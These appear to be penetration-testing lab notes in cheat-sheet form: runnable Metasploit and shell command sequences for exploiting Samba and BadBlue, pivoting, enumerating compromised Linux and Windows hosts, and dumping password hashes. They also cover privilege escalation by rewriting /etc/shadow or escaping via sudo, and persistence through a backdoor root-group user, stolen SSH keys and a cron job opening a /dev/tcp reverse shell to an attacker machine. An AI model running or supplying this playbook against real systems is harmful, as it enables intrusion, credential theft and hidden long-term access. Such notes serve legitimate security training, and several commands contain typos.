> portfwd add -l 1234 -p 80 -r <Victim-2-Ip>
> background
> db_nmap -sS -sV -p 1234 localhost
> use exploit/windows/http/badblue_passthru
> set payload windows/meterpreter/bind_tcp
> set RHOSTS <V-2-Ip>
> set LPORT 4433
> exploit
> sysinfo
Linux Post Exploitation#
Post-Exploitation Modules#
> search samba
> use exploit/linux/samba/is_known_pipename
> set RHOSTS <IP>
> exploit
> pwd
> background
> sessions -u 1
> sessions 2
> sysinfo
> getuid
> shell
> /bin/bash -i
> whoami
> uname -r
> uname -a
> ifconfig
> ip a s
> netstat -antp
> ps aux
> env
> terminate
> sessions -u 1
> search enum_configs
> set SESSION <Meterpreter>
> run
> loot
> serach env platform:linux
> use post/multi/gather/env
> set SESSION <id>
> run
> search enum_network
> use post/linux/gather/enum_network
> set SESSION <id>
> run
> search enum_protections
> set SESSION <id>
> run
> notes
> search enum_system
> set SESSION <id>
> run
> serach checkcontainer
> set SESSION <id>
> run
> search enum_users_history
> set SESSION <id>
> run
Linux Privilege Escalation#
> setg RHOSTS <IP>
> search ssh_login
> use auxiliary/scanner/ssh/ssh_login
> set USERNAME jackie
> set PASSWORD password
> exploit
> sessions 1
> pwd
> whoami
> background
> sessions -u 1
> sessions 2
> sysinfo
> getuid
> bash
> ps aux
> cat /bin/check-down
> chkrootkit --help
> chkrootkit -V
> background
> saerch chkrootkit
> show options
> set CHKROOKIT /bin/chkrootkit
> set SESSION <mp-id>
> set LHOST eth1
> exploit
> /bin/bash -i
Dumping Hashes with Hashdump#
> setg RHOSTS <IP>
> use exploit/linux/samba/is_known_pipename
> exploit
> sessions -u 1
> sessions 2
> sysinfo
> getuid
> background
> search hashdump
> use post/linux/gather/hashdump
> show options
> set SESSION <id>
> run
> loot
> sessions 3
> /bin/bash -i
Establishing Persistence on Linux#
> use auxiliary/scanner/ssh/ssh_login
> set USERNAME jackie
> set PASSWORD password
> exploit
> sessions
> sessions -u 1
> sessions 2
> search chkrootkit
> set SESSION <id>
> set CHKROOTKIT /bin/chkrootkit
> set LHOSTS eth1
> set LPORT <>
> exploit
> sessions -u 3
> sessions 4
> getuid
> shell
> /bin/bash -i
> useradd -m ftp -s /bin/bash
> passwd ftp // enter: password123
> cat /etc/passwd
> groups root
> usermod -aG root ftp
> groups ftp
> usermod -u 15 ftp
> cat /etc/passwd
> search platform:linux persistence
> use exploit/linux/local/cron_persistence
> set SESSION 4
> set LPORT 4422
> set LHOST eth1
> exploit // fail
> use exploit/linux/local/service_persistence
> set SESSION 4
> set payload cmd/unix/reverse_python
> set LPORT 4422
> exploit // fail
> set target 4
> exploit // fail
> use exploit/linux/local/sshkey_persistence
> set CREATESSHFOLDER true
> set SESSION 4
> exploit
> loot
> cat private_key.txt // use from loot
> nano ssh_key // paste the key
> chmod 0400 ssh_key
> ssh -i ssh_key root@<target-ip>
>
Exploitation#
Banner Grabbing#
> nmap -sV -O <IP>
> ls -la /usr/share/nmap/scripts | grep banner
> nmap -sV --script=banner <IP>
> nc <IP> <Port>
Nmap Vulnerability Scanning#
> nmap -sV -O <IP>
> ls -la /usr/share/nmap/scripts/ | grep http
> nmap -sV --script=http-enum <IP>
Post Exploitation#
Methodology#
- Local Enumeration
- Transferring Files
- Upgrading Shells
- Privilege Escalation
- Persistence
- Dumping & Cracking Hashes
- Pivoting
- Clearing Tracks
Windows#
Enum Users & Groups#
> use post/windows/gather/enum_logged_on_users
> set SESSION 1
> run
> shell
> net user administrator
> whoami /priv
> route print
> netstat -ano
> netsh firewall show state
> tasklist /SVC // Enumerate the list of running processes
> show_mount
> use post/windows/gather/win_privs
> set SESSION 1
> run
> use post/windows/gather/enum_applications
> use post/windows/gather/enum_computers
> use post/windows/gather/enum_patches
Linux#
Enum#
> useradd bob -s /bin/bash
> githum.com/rebootuser/LinEnum
Windows Priv Escalation#
> PrivescCheck
> search web_delivery
> use exploit/multi/script/web_delivery
> set TARGET PSH\ (Binary)
> set payload windows/shell/reverse_tcp
> set PSH-EncodedCommand false
> set LHOST eth1
> exploit
> copy & paste in windows cmd
> whoami
> background
> use shell_to_meterpreter
> set LHOST eth1
> set WIN_TRANSFER VBS
> exploit
Linux Priv Escalation#
// Exploiting Permissions
> whoami
> cat /etc/passwd
> find / -not -type l -perm -o+w
> cat /etc/shadow
> openssl passwd -1 -salt abc password
> nano /etc/shadow // Remove * & paste the hash
> su
// Exploiting SUDO Privs
> cat /etc/passwd
> sudo -l
> sudo man cat
> !/bin/bash
Linux Persistence#
// Via SSH Keys
> ssh student@<IP> // password:password
> ls -la
> cat wait
> cd .ssh
> cat id_rsa
> cat authorized_key
> scp student@<IP>:~/.ssh/id_rsa . // copy id_rsa locally
> chmod 400 id_rsa
> ssh student@<IP> // password:password
> rm wait
> ssh -i id_rsa student@<IP>
// Via Cron Jobs
> ssh student@<IP> // password:password
> cat /etc/cron*
> echo "* * * * * /bin/bash -c 'bash -i >& /dev/tcp/<kali-ip>/<port> 0>&1'" > cron
> cat cron
> crontab -i cron
> crontab -l
> rm wait
> nc -nvlp 1234
>